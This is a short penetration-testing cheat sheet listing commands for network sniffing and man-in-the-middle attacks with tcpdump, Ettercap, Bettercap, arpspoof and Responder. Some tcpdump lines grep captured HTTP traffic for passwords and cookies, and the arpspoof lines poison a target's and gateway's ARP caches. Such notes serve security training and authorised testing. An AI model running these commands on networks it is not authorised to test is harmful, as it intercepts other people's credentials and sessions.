# Sniffing and MitM attacks

## Tcpdump

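```shell
# Capture all traffic on an interface
tcpdump -i <interface>
# Filter by source address, destination address and port
tcpdump -i <interface> -v src <source-IP-address> and dst <destination-IP-address> and port <port>
# Filter HTTP output for request lines, credential parameters and cookies
# (-l line-buffers tcpdump output so matches reach grep without delay)
tcpdump -i <interface> -l -v port 80 | grep -Ei "POST /|GET /|Host:"
tcpdump -i <interface> -l -v port 80 | grep -Ei "POST /|GET /|clave=|pwd=|passwd=|password=|Host:"
tcpdump -i <interface> -l -v port 80 | grep -Ei "Set-Cookie:|Cookie:|Host:"
# Read a saved capture file
tcpdump -r <file.pcap>
```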

## Ettercap

* <https://www.ettercap-project.org/>

```bash
ettercap -G
```

## Bettercap

* <https://www.bettercap.org/>

```shell
# General
bettercap
net.probe on
net.recon on
net.sniff on
net.show
events.show

# Interface selection
bettercap -iface <interface>

# Sniffing a specific host and port
set net.sniff.filter "host <IP-address> and port <port>"
net.sniff on
events.show

# User interface (user:pass)
bettercap -caplet http-ui
```

## ARPspoof

```shell
arpspoof -i <interface> -t <gateway-IP-address> <target-IP-address>
arpspoof -i <interface> -t <target-IP-address> <gateway-IP-address>
```

## Responder

```shell
responder -I <interface> -A
```
